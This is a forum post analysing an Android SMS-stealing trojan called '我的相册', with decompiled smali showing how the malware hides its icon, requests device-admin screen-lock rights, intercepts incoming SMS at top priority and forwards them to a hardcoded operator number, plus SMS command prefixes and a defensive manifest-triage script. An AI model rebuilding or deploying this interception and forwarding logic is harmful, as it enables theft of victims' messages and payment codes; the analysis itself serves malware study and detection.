[Mobile sample analysis] Analysis of the SMS-monitoring trojan "我的相册" (My Album)

h_one posted on 2014-8-8 20:04
【Trojan name】: 我的相册 (My Album)
【Package name】: sada.rlnihao.testrlnihao
【Analysis tool】: APK改之理
【Anti-decompilation】: Invalid code inserted into the dex inside a class that is never called, so the APK cannot be repackaged and cannot be converted to Java code
【Trojan characteristics】: Monitors and intercepts incoming SMS, and can control the phone

With the rapid rise of the mobile Internet, mobile payment on phones has grown explosively. But while mobile payment makes life more convenient, it also faces more and more risks. The recent appearance of xxshenqi stirred up Android mobile security once again. I expect that over the coming period there will be a large number of xxshenqi-style variants; that brings us challenges and learning opportunities, and the side benefit is that it reminds ordinary users that their phones need protecting. The night before last, something called "我的相册" (My Album) popped up in a QQ group, and my first reaction was that it was a trojan. If it is a trojan, the best outcome is of course to find its source, such as a phone number or e-mail address. I decompiled it with APK改之理 and found that it could not be converted to Java code, so I read the smali instead; when I tried to repackage it I found this:


[Figure 1.png: the repackaging failure]
It turned out that invalid bytecode had been inserted into an unused class to cripple reversing tools: most reversing tools read and parse the bytecode linearly, and when they hit the invalid bytes the disassembler's bytecode parsing fails. I have run into this problem again and really don't know how to handle it, so for now let's just read the smali.



Code tree structure: [Figure 2.jpg]    Overall trojan workflow: [Figure 3.jpg]

Detailed analysis:
First we look at its AndroidManifest file to see which permissions it has and where its entry points are.
[Figure 4.jpg: AndroidManifest permissions and entry points]
Having sorted out its capabilities and entry points, we now analyze them one by one.

Entry point 1: MainActivity analysis
It starts SmsService, calls ShareUtil.getFlag() to check whether the Flag is "true", and calls SmsUtil.compareDate() to check whether the current time is after 2014.8.31; when those conditions are met it sends "Install Success!" by SMS to the trojan author. So this is a variant trojan, and a fairly new one.
```smali
    invoke-direct {v1}, Landroid/content/Intent;-><init>()V
# Intent intent2 = new Intent();
    .line 22
    .local v1, "intent2":Landroid/content/Intent;
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
    move-result-object v5
# Context v5 = this.getApplicationContext();
    const-class v6, Lsada/nihao/testnihao/SmsService;
    invoke-virtual {v1, v5, v6}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
# intent2.setClass(getApplicationContext(), SmsService.class);
    .line 23
    invoke-virtual {p0, v1}, Lsada/nihao/testnihao/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
# MainActivity.startService(intent2);
    .line 26
    :try_start_0
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
    move-result-object v5
    invoke-static {v5}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
    move-result-object v4
# ShareUtil su = ShareUtil.getInstance(getApplicationContext());
    .line 27
    .local v4, "su":Lsada/nihao/testnihao/ShareUtil;
    const-string v5, ""
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getFlag()Ljava/lang/String;
    move-result-object v6
# String strFlag = su.getFlag();  check whether Flag equals ""
    invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    move-result v5
# if Flag is not "", jump to label cond_1
    if-eqz v5, :cond_1
    .line 28
    invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
# call SmsUtil.compareDate() to check whether the current time is before "2014-08-31 23:00:00"
    move-result v5
```


It then checks whether the LockRec component already holds device-administrator rights; if not, it registers LockRec as a device administrator, and then calls PackageManager.setComponentEnabledSetting(getComponentName(), 2, 1) to hide the launcher icon.


```smali
    const-string v5, "device_policy"
    invoke-virtual {p0, v5}, Lsada/nihao/testnihao/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
    move-result-object v5
    check-cast v5, Landroid/app/admin/DevicePolicyManager;
# DevicePolicyManager is the main device-administration class; through it an app can lock the screen, adjust screen brightness, factory-reset the device, and so on
    iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
# obtain the device-policy service:  this.policyManager = this.getSystemService("device_policy");
    .line 38
    new-instance v5, Landroid/content/ComponentName;
    const-class v6, Lsada/nihao/testnihao/LockRec;
    invoke-direct {v5, p0, v6}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
# ComponentName com = new ComponentName(this, LockRec.class);
    iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
# this.componentName = com;
    .line 39
    iget-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
# DevicePolicyManager v5 = this.policyManager;
    iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
# ComponentName v6 = this.componentName;
    invoke-virtual {v5, v6}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
# boolean bret = v5.isAdminActive(v6);   // is the LockRec component already an active device administrator?
    move-result v5
    if-nez v5, :cond_2
# jumping to cond_2 means LockRec already has device-administrator rights

########################################################################################################################
    # next, request device-administrator rights for the LockRec component
    .line 41
    new-instance v2, Landroid/content/Intent;
    const-string v5, "android.app.action.ADD_DEVICE_ADMIN"
    invoke-direct {v2, v5}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
# Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    .line 42
    .local v2, "localIntent":Landroid/content/Intent;
    const-string v5, "android.app.extra.DEVICE_ADMIN"
    iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
    invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
# names LockRec as the component to receive admin rights:  localIntent.putExtra("android.app.extra.DEVICE_ADMIN", componentName);
    .line 43
    const-string v5, "android.app.extra.ADD_EXPLANATION"
    const-string v6, "\u8bbe\u5907\u7ba1\u7406\u5668"
# String v6 = "设备管理器" ("Device Manager")
    invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
    .line 44
    invoke-virtual {p0, v2}, Lsada/nihao/testnihao/MainActivity;->startActivity(Landroid/content/Intent;)V
# this.startActivity(localIntent);
    .line 51
    .end local v2    # "localIntent":Landroid/content/Intent;
    :cond_2
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getPackageManager()Landroid/content/pm/PackageManager;
    move-result-object v3
# PackageManager p = this.getPackageManager();
    .line 52
    .local v3, "p":Landroid/content/pm/PackageManager;
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getComponentName()Landroid/content/ComponentName;
    move-result-object v5
# ComponentName v5 = getComponentName();
    const/4 v6, 0x2
    const/4 v7, 0x1
    invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
# hide the icon:  getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    .line 53
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->finish()V
```


So what is LockRec? We can look it up in AndroidManifest.xml:
```xml
<!-- Receiver for screen locking, factory reset and password change; the details are in the xml file named by android:resource -->
        <receiver android:description="@string/str" android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
```

This exists so that the app can use DevicePolicyManager, the device security management service, to do something. Exactly what is declared in the lock_screen file that the android:resource attribute in the code above points to:
```xml
<?xml version="1.0" encoding="utf-8"?>
<device-admin
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
        <!-- force-lock: the app may lock the device screen -->
        <force-lock />
    </uses-policies>
</device-admin>
```

So what the trojan wants to do is lock the screen.
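The manifest and policy checks just walked through by hand can be automated for triage. The script below is an added example written for this post, not code from the trojan or from any tool the author used: it parses a manifest fragment and a device-admin policy resource and reports the combination seen here (SMS permissions, boot persistence, a BIND_DEVICE_ADMIN receiver whose label imitates a system component, and a force-lock policy). The manifest fragment is a constructed sample modelled on the LockRec receiver above; its permission list is an assumption, since the post shows the real one only as an image, and the indicator names are mine.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest fragment, modelled on the LockRec receiver shown in the post.
# The permission list is an assumption (the post shows the real one only as an image).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="sada.nihao.testnihao">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <receiver android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed copy of the res/xml/lock_screen policy shown in the post.
SAMPLE_LOCK_SCREEN = """<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-policies>
    <force-lock />
  </uses-policies>
</device-admin>"""

SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
             "android.permission.SEND_SMS"}
BOOT_PERM = "android.permission.RECEIVE_BOOT_COMPLETED"


def android_attr(elem, name):
    """Read an android:-namespaced attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def permissions(manifest_xml):
    """Set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {android_attr(p, "name") for p in root.iter("uses-permission")}


def device_admin_receivers(manifest_xml):
    """Receivers guarded by BIND_DEVICE_ADMIN, with the policy resource they declare."""
    root = ET.fromstring(manifest_xml)
    found = []
    for rcv in root.iter("receiver"):
        if android_attr(rcv, "permission") != "android.permission.BIND_DEVICE_ADMIN":
            continue
        resource = None
        for meta in rcv.iter("meta-data"):
            if android_attr(meta, "name") == "android.app.device_admin":
                resource = android_attr(meta, "resource")
        found.append({"name": android_attr(rcv, "name"),
                      "label": android_attr(rcv, "label") or "",
                      "resource": resource})
    return found


def admin_policies(policy_xml):
    """Policy tags requested under <uses-policies> in a device-admin resource."""
    root = ET.fromstring(policy_xml)
    return [child.tag for up in root.iter("uses-policies") for child in up]


def triage(manifest_xml, xml_resources):
    """Return indicator names for the manifest. xml_resources maps a resource name
    such as "lock_screen" to the text of res/xml/<name>.xml."""
    perms = permissions(manifest_xml)
    findings = []
    if SMS_PERMS <= perms:
        findings.append("sms-intercept-and-forward")
    if BOOT_PERM in perms and SMS_PERMS & perms:
        findings.append("boot-persistence-with-sms")
    for rcv in device_admin_receivers(manifest_xml):
        if "system" in rcv["label"].lower():
            findings.append("device-admin-label-imitates-system:" + rcv["name"])
        res_name = (rcv["resource"] or "").split("/")[-1]  # "@xml/lock_screen" -> "lock_screen"
        policies = admin_policies(xml_resources[res_name]) if res_name in xml_resources else []
        if "force-lock" in policies:
            findings.append("device-admin-force-lock:" + rcv["name"])
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_MANIFEST, {"lock_screen": SAMPLE_LOCK_SCREEN}):
        print(finding)
```

On a real sample the two inputs are the decoded AndroidManifest.xml and the res/xml files that apktool or APK改之理 write out; the label check matters because a device-admin prompt titled "System 设备管理器" is what persuades the victim to grant the lock-screen policy.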

Entry point 2: the boot-completed broadcast listener
It starts a service named "WatchDogService":
```smali
new-instance v0, Landroid/content/Intent;
const-class v1, Lsada/nihao/testnihao/SmsService;
invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
.line 15
.local v0, "WatchDogService":Landroid/content/Intent;
const/high16 v1, 0x10000000
invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
.line 16
invoke-virtual {p1, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
```


The service entry function onCreate()
1. Registers the SmsObserver class, which extends ContentObserver and observes database changes under a specific Uri; this trojan uses it to watch the SMS inbox.
```smali
    .line 27
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getContentResolver()Landroid/content/ContentResolver;
    move-result-object v1
    .line 28
    .local v1, "resolver":Landroid/content/ContentResolver;
    new-instance v2, Lsada/nihao/testnihao/SmsObserver;
# resolver = this.getContentResolver();  obtain the content resolver
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getApplicationContext()Landroid/content/Context;
    move-result-object v3
    new-instance v4, Lsada/nihao/testnihao/SmsHandler;
    invoke-direct {v4, p0}, Lsada/nihao/testnihao/SmsHandler;-><init>(Landroid/content/Context;)V
    invoke-direct {v2, v3, v1, v4}, Lsada/nihao/testnihao/SmsObserver;-><init>(Landroid/content/Context;Landroid/content/ContentResolver;Lsada/nihao/testnihao/SmsHandler;)V
    iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
    .line 29
    const-string v2, "content://sms"
    invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
# Uri uri = Uri.parse("content://sms");
    move-result-object v2
    const/4 v3, 0x1
    iget-object v4, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
    invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
# register the observer to watch for changes in the SMS database
# resolver.registerContentObserver(uri, true, new SmsObserver(getApplicationContext(), resolver, new SmsHandler(this)));
```

2. Dynamically registers SmsReceiver and gives it the highest priority, so that even with security software on the phone, after a reboot it may still be the first to get the SMS.
```smali
    new-instance v2, Lsada/nihao/testnihao/SmsReceiver;
    invoke-direct {v2}, Lsada/nihao/testnihao/SmsReceiver;-><init>()V

##########################################################################################################################
# dynamically register the SmsReceiver broadcast receiver
# SmsReceiver smsRec = new SmsReceiver();
    iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
    .line 32
    new-instance v0, Landroid/content/IntentFilter;
    const-string v2, "android.provider.Telephony.SMS_RECEIVED"
# the incoming-SMS broadcast to intercept
    invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
# IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    .line 33
    .local v0, "intentFilter":Landroid/content/IntentFilter;
    const v2, 0x7fffffff
    invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
# intentFilter.setPriority(0x7FFFFFFF);
    .line 34
    iget-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
# SmsReceiver v2 = SmsService.smsReceiver;
    new-instance v3, Landroid/content/IntentFilter;
    const-string v4, "android.provider.Telephony.SMS_RECEIVED"
    invoke-direct {v3, v4}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
# IntentFilter intentFilter2 = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    invoke-virtual {p0, v2, v3}, Lsada/nihao/testnihao/SmsService;->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)Landroid/content/Intent;
# SmsService.registerReceiver(SmsService.smsReceiver, intentFilter2);
# dynamically registers the receiver for the SMS broadcast; setPriority() gives the filter the highest possible priority
    .line 35
    return-void
.end method
```


At this point inbox monitoring has been registered. When a message arrives on the infected phone, whether from an ordinary sender or from the trojan operator, SmsObserver's onChange is triggered:
it reads the chosen SMS columns, packs them into a Message and then hands it to SmsHandler.

```smali
    const-string v4, "read=?"
# columns to fetch
# String[] PROJECTION = {"_id", "address", "read", "body", "thread_id"};
    const/4 v5, 0x1
    new-array v5, v5, [Ljava/lang/String;
    const/4 v6, 0x0
    const-string v16, "0"
    aput-object v16, v5, v6
    const-string v6, "date desc"
    invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
# read the chosen columns of the inbox
# Cursor mCursor = resolver.query(Uri.parse("content://sms/inbox"), PROJECTION, "read=?", new String[]{"0"}, "date desc");
    move-result-object v11
    .line 32
    .local v11, "mCursor":Landroid/database/Cursor;
    if-nez v11, :cond_8
# if (mCursor != null) continue at cond_8, otherwise return
    .line 88
    :cond_0
    :goto_0
    return-void
    .line 40
    :cond_1
    new-instance v8, Lsada/nihao/testnihao/SmsInfo;
    invoke-direct {v8}, Lsada/nihao/testnihao/SmsInfo;-><init>()V
# SmsInfo _smsInfo = new SmsInfo();
    .line 42
    .local v8, "_smsInfo":Lsada/nihao/testnihao/SmsInfo;
    const-string v1, "_id"
# int _inIndex = mCursor.getColumnIndex("_id");
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    move-result v7
    .line 43
    .local v7, "_inIndex":I
    const/4 v1, -0x1
    if-eq v7, v1, :cond_2
    .line 45
    invoke-interface {v11, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    move-result-object v1
# _smsInfo._id = mCursor.getString(mCursor.getColumnIndex("_id"));
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->_id:Ljava/lang/String;
    .line 48
    :cond_2
    const-string v1, "thread_id"
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    move-result v15
    .line 49
    .local v15, "thread_idIndex":I
    const/4 v1, -0x1
    if-eq v15, v1, :cond_3
    .line 51
    invoke-interface {v11, v15}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    move-result-object v1
# _smsInfo.thread_id = mCursor.getString(mCursor.getColumnIndex("thread_id"));
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->thread_id:Ljava/lang/String;
    .line 54
    :cond_3
    const-string v1, "address"
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    move-result v9
    .line 55
    .local v9, "addressIndex":I
    const/4 v1, -0x1
    if-eq v9, v1, :cond_4
    .line 57
    invoke-interface {v11, v9}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    move-result-object v1
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
# _smsInfo.smsAddress = mCursor.getString(mCursor.getColumnIndex("address"));
    .line 60
    :cond_4
    const-string v1, "body"
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    move-result v10
    .line 61
    .local v10, "bodyIndex":I
    const/4 v1, -0x1
    if-eq v10, v1, :cond_5
    .line 63
    invoke-interface {v11, v10}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    move-result-object v1
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
# _smsInfo.smsBody = mCursor.getString(mCursor.getColumnIndex("body"));
    .line 66
    :cond_5
    const-string v1, "read"
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    move-result v13
    .line 67
    .local v13, "readIndex":I
    const/4 v1, -0x1
    if-eq v13, v1, :cond_6
    .line 69
    invoke-interface {v11, v13}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    move-result-object v1
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->read:Ljava/lang/String;
# _smsInfo.read = mCursor.getString(mCursor.getColumnIndex("read"));
    .line 71
    :cond_6
    move-object/from16 v0, p0
    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
# pack the collected SMS fields and notify the Handler
    invoke-virtual {v1}, Lsada/nihao/testnihao/SmsHandler;->obtainMessage()Landroid/os/Message;
    move-result-object v12
    .line 72
    .local v12, "msg":Landroid/os/Message;
    move-object/from16 v0, p0
# Message msg = smsHandler.obtainMessage();
    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->mContext:Landroid/content/Context;
    invoke-static {v1}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
    move-result-object v14
    .line 73
    .local v14, "su":Lsada/nihao/testnihao/ShareUtil;
    const-string v1, "1"
# ShareUtil su = ShareUtil.getInstance(this.mContext);
    invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
    move-result-object v2
    invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    move-result v1
    if-nez v1, :cond_7
    iget-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
# who sent this message?
    invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
    move-result-object v2
    invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
    move-result v1
    if-eqz v1, :cond_9
    .line 74
    :cond_7
    const/4 v1, 0x2
    iput v1, v8, Lsada/nihao/testnihao/SmsInfo;->action:I
    .line 78
    :goto_1
    iput-object v8, v12, Landroid/os/Message;->obj:Ljava/lang/Object;
# msg.obj = _smsInfo;
    .line 79
    move-object/from16 v0, p0
    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
# smsHandler.sendMessage(msg);  hands the harvested inbox data to the handler
    invoke-virtual {v1, v12}, Lsada/nihao/testnihao/SmsHandler;->sendMessage(Landroid/os/Message;)Z
```


In the SmsHandler class:
1. It checks whether the sender is the trojan author's phone number; if so, it enters the phone-control flow.
2. If the message came from an ordinary number, it forwards the SMS to itself (the trojan author).

```smali
    .line 41
    .local v4, "su":Lsada/nihao/testnihao/ShareUtil;
    :try_start_0
    invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
    move-result v6
    if-nez v6, :cond_0
    .line 42
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
# String v6 = SmsInfo.smsAddress;  the sender's phone number
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
# the trojan author's phone number
    move-result-object v7
    invoke-virtual {v6, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
# was this message sent by the trojan author?
    move-result v6
# v6 non-zero means the author sent it; this is how the phone gets controlled
    if-eqz v6, :cond_2
###########################################################################################################################################################################
# the phone-control path used by the trojan author
    .line 43
    new-instance v2, Lsada/nihao/testnihao/SMSEntity;
    invoke-direct {v2}, Lsada/nihao/testnihao/SMSEntity;-><init>()V
# SMSEntity sms = new SMSEntity();
    .line 44
    .local v2, "sms":Lsada/nihao/testnihao/SMSEntity;
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
    iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
# sms.smsTitle = SmsInfo.smsAddress;
    .line 45
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
    iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
# sms.smsContent = SmsInfo.smsBody;
    .line 46
    iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
    invoke-static {v6, v2}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
# SmsUtil.parseStr(this.mcontext, sms);
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
    move-result-object v7
    invoke-virtual {v6, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    move-result v6
    if-eqz v6, :cond_0
    .line 49
    const-string v6, "\u6570\u636e\u5e93\u53d1\u9001"
# "数据库发送" ("database send")
    const-string v7, ""
# forward the SMS the user received to the trojan author
    invoke-static {v6, v7}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    .line 50
    iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
    move-result-object v7
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
    move-result-object v8
    new-instance v9, Ljava/lang/StringBuilder;
    iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
    invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    move-result-object v10
    invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
    invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v9
    invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    move-result-object v9
    invoke-static {v6, v7, v8, v9}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Lj
```


The trojan author's details and the SMS command prefixes are packed into the Const class:
```smali
    const/4 v1, 0x0
    const-string v2, "13601574293"
    aput-object v2, v0, v1
# String v0[0] = "13601574293";
    const/4 v1, 0x1
    const-string v2, ""
    aput-object v2, v0, v1
# String v0[1] = "";
    sput-object v0, Lsada/nihao/testnihao/Const;->nums:[Ljava/lang/String;
# Const.nums = v0;
    .line 108
    const-string v0, "#T"
    sput-object v0, Lsada/nihao/testnihao/Const;->transpond:Ljava/lang/String;
# Const.transpond = "#T";
    .line 109
    const-string v0, "#S"
    sput-object v0, Lsada/nihao/testnihao/Const;->switch1:Ljava/lang/String;
# Const.switch1 = "#S";
    .line 110
    const-string v0, "#C"
    sput-object v0, Lsada/nihao/testnihao/Const;->change:Ljava/lang/String;
# Const.change = "#C";
    .line 111
    const-string v0, "SHA_PRE"
    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PRE:Ljava/lang/String;
# Const.SHA_PRE = "SHA_PRE";
    .line 112
    const-string v0, "SHARE_FLAG"
    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_FLAG:Ljava/lang/String;
# Const.SHA_FLAG = "SHARE_FLAG";
    .line 113
    const-string v0, "SHA_PHO"
    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHO:Ljava/lang/String;
    .line 114
    const-string v0, "SHARE_PHONE1"
    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHONE1:Ljava/lang/String;
    .line 115
    const-string v0, "SHARE_SWITCH"
    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_SWITCH:Ljava/lang/String;
    return-void
```


Entry point 3: the SMS broadcast listener
```smali
    .line 28
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
# SmsReceiver.abortBroadcast() stops the SMS broadcast from reaching lower-priority receivers
    .line 29
    invoke-static {p1, v1}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
# enters SmsUtil.parseStr(), which identifies the sender of the SMS

    .line 33
    invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
    move-result-object v3
    invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
    move-result-object v4
    new-instance v5, Ljava/lang/StringBuilder;
    iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
    invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    move-result-object v6
    invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
    invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v5
    invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    move-result-object v5
# forward the SMS to the trojan author
    invoke-static {p1, v3, v4, v5}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lja
```

Through these three entry points we have more or less figured out this trojan. But the technique of inserting invalid bytecode into an unused class to cripple reversing tools is something this newbie really does not know how to deal with, and I hope to exchange ideas and learn from everyone.
Testing found that 360手机卫士 (360 Mobile Guard) and 腾讯管家 (Tencent Mobile Manager) detect and remove it accurately, while 百度手机卫士 (Baidu Mobile Guard) cannot yet.

Comments

Is it time for another round of 呼死你 (call flooding)? --13601574293  posted on 2014-9-21 20:27
Bowing to the expert  posted on 2014-8-26 18:48


oyefer posted on 2014-8-25 15:07
Looks like Android trojans will become more and more numerous, and more and more hidden..
amscracker posted on 2014-8-8 20:08
